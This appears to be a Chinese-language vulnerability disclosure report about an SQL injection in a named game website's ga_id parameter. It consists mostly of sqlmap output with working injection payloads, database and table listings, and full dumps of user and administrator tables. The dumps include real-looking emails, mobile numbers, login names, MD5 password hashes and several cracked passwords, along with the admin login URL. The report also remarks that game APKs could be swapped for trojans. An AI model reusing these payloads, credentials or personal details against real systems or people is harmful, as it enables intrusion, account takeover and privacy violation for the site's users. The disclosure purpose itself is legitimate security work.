2015-08-04: 细节已通知厂商并且等待厂商处理中 2015-08-07: 厂商已经确认,细节仅向厂商公开 2015-08-17: 细节向核心白帽子及相关领域专家公开 2015-08-27: 细节向普通白帽子公开 2015-09-06: 细节向实习白帽子公开 2015-09-21: 细节向公众公开
会员信息泄露很多充值用户可以洗钱可以上传apk木马
注入点
http://www.caohua.com/zoning/zo_ga_list?ga_id=1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: ga_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ga_id=1 AND 3417=3417 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ga_id=1 AND (SELECT 4565 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(4565=4565,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: ga_id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))MRAA)---web server operating system: Windowsweb application technology: ASP.NET, Nginx, PHP 5.4.24back-end DBMS: MySQL >= 5.0.0available databases [4]:[*] `\\ckc\x0b`[*] `\x15\x11%I\x1b&'iJ`[*] `J\x03"\x13S`[*] information_schema
发现乱码 查询下当前库
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: ga_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ga_id=1 AND 3417=3417 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ga_id=1 AND (SELECT 4565 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(4565=4565,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: ga_id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))MRAA)---web server operating system: Windowsweb application technology: ASP.NET, Nginx, PHP 5.4.24back-end DBMS: MySQL >= 5.0.0current database: 'phpcaohua'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: ga_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ga_id=1 AND 3417=3417 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ga_id=1 AND (SELECT 4565 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(4565=4565,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: ga_id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))MRAA)---web server operating system: Windowsweb application technology: ASP.NET, Nginx, PHP 5.4.24back-end DBMS: MySQL >= 5.0.0Database: phpcaohua[45 tables]+-----------------------+| c_account || c_active_use || c_ads_class || c_article || c_article_type || c_branch || c_certified || c_channel_account || c_channel_bank || c_channel_pick || c_chat_record || c_comment || c_data_channel_total || c_data_uchannel_total || c_down_games || c_focus || c_game_info || c_game_type || c_games_pay || c_games_user || c_group_buy || c_group_level || c_login_admin || c_maintain_vip || c_manage_user || c_package || c_package_rev || c_package_type || c_pay_order || c_pl_access || c_pl_game_users || c_pl_pay_order || c_play_appoint || c_privilege || c_produce || c_produce_sale || c_question || c_question_write || c_rank || c_role || c_role_privilege || c_user || c_user_v || c_wealth_log || c_ztactivs_user |+-----------------------+Database: phpcaohua+-------------------+---------+| Table | Entries |+-------------------+---------+| c_package | 212311 || c_wealth_log | 198542 || c_package_rev | 155527 || c_user | 62338 || c_account | 62287 || c_pay_order | 34990 || c_question_write | 1248 || c_game_info | 48 || c_focus | 41 || c_ads_class | 22 || c_article_type | 20 || c_rank | 11 || c_branch | 7 || c_group_buy | 6 || c_maintain_vip | 6 || c_role | 5 || c_group_level | 4 || c_produce | 4 || c_channel_account | 1 |+-------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: ga_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ga_id=1 AND 3417=3417 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ga_id=1 AND (SELECT 4565 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(4565=4565,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: ga_id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))MRAA)---web server operating system: Windowsweb application technology: ASP.NET, Nginx, PHP 5.4.24back-end DBMS: MySQL >= 5.0.0Database: phpcaohuaTable: c_user[12 entries]+-------------------+---------------------------------------------+----------------------------------+-------------+| email | password | uce_pass | login_name |+-------------------+---------------------------------------------+----------------------------------+-------------+| NULL | E25B2B1BAC165D1949405E9B6DC8FC15 | 00002961 | joycegong || 2856023741@qq.com | AFAB92058AA1762FA6D58C90CC6B6FF5 | 0196454653c67b25b82711c686a66817 | 15190225806 || zsj999@163.com | 2D3CD0366343ACCC04B8AF4C88F803D1 | NULL | 85357858aa || NULL | 3B814C816BC7C23A11CA8CC52ECB0F04 | fjm15190225806 | 18227201760 || NULL | 5E1A52C3A8C0BD0D6BABAB68D1E71D05 | NULL | 13754637142 || <blank> | 7D92D378826BAFAFE7A3DFA0C2A11884 | NULL | 17701620813 || NULL | 7B0DBBEBCE6EB50E8865CC3B23B1045F | NULL | 13739571720 || 105322355@qq.com | 7FEF6171469E80D32C0559F88B377245 (admin888) | admin888 | 13753522369 || NULL | DD4B21E9EF71E1291183A46B913AE6F2 (00000000) | 00000000 | admin || NULL | F805CF9589D118D8B804DF78F0AA67DA | 211847 | 4352698 || NULL | E10ADC3949BA59ABBE56E057F20F883E (123456) | 123456 | 2726084746 || NULL | A68AE418CFD0110DACEFCB0A39970A56 | lw851227 | jiulidao |+-------------------+---------------------------------------------+----------------------------------+-------------+
看下管理员
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: ga_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ga_id=1 AND 3417=3417 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ga_id=1 AND (SELECT 4565 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(4565=4565,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: ga_id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))MRAA)---web server operating system: Windowsweb application technology: ASP.NET, Nginx, PHP 5.4.24back-end DBMS: MySQL >= 5.0.0Database: phpcaohuaTable: c_manage_user[8 entries]+-------------------------------------------+--------------+------------------+---------------+| manage_pass | manage_user | manage_email | manage_mobile |+-------------------------------------------+--------------+------------------+---------------+| 6e0a72004b1c7ef6f34ca5604ebadcb2 | caohuahupeng | | 18711063293 || 759a73c078112460fae616557770fd04 | 28yAndyFei | | 13787173861 || e10adc3949ba59abbe56e057f20f883e (123456) | cindy2140 | | 18621761232 || 65fc5b5480d6da94787380c8c6c523b9 | | fulei@caohua.com | 18666663256 || 0399f77aa65c238918b841dd3a1f028e | | | |+-------------------------------------------+--------------+------------------+---------------+
后台地址
http://www.caohua.com/admin.php
礼包任意领
此处可以更换apk木马 后果很严重
土豪很多里面好多有钱的
来看看VIP10的
希望厂商重视起来否则很严重
危害等级:高
漏洞Rank:11
确认时间:2015-08-07 09:40
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。
暂无
